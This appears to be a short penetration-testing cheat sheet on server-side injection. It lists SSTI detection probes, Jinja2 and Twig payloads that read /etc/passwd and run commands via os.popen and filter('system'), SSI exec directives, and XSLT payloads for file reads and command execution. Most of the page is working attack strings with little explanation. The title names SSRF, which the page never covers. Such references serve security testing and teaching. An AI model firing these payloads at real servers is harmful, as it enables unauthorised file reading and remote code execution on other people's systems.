Server Side Attacks (SSRF)

SSRF, SSTI and SSI injections.

Server-side Template Injection or SSTI

SSTI occurs when user input is inserted into the template itself before rendering, allowing code execution. Like with SQL we can identify vulnerabilities using:

{{7*7}}
{{7*'7'}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Find payloads:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Python.md

Local File Inclusion (LFI) Jinja2

{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

Remote Code Executino (RCE) Jinja2

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Local File Inclusion (LFI) Twig

{{ "/etc/passwd"|file_excerpt(1,-1) }}

Remote Code Executino (RCE) Twig

{{ ['id'] | filter('system') }}

SSI Injection

Server-Side Includes (SSI) is used by webapps to create dynamic content on HTML pages. The use of SSI can be found if files are used:

.shtml
.shtm
.stm

SSI uses directives consisting of:

name: the directive's name
parameter name: one or more parameters
value: one or more parameter values

Several payloads

<!--#printenv -->
<!--#name param1="value1" param2="value" -->
<!--#exec cmd="whoami" -->

XSLT Injections

eXtensible Stylesheet Language Transformation (XSLT) can select specific nodes from an XML document and change the XML structure.

# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

# RCE
<xsl:value-of select="php:function('system','id')" />

Windows

Linux

Web

AI

Server Side Attacks (SSRF)

Server-side Template Injection or SSTI

SSI Injection

XSLT Injections

© 2025 | All rights reserved

Inquiries at contact@dannydekkers.nl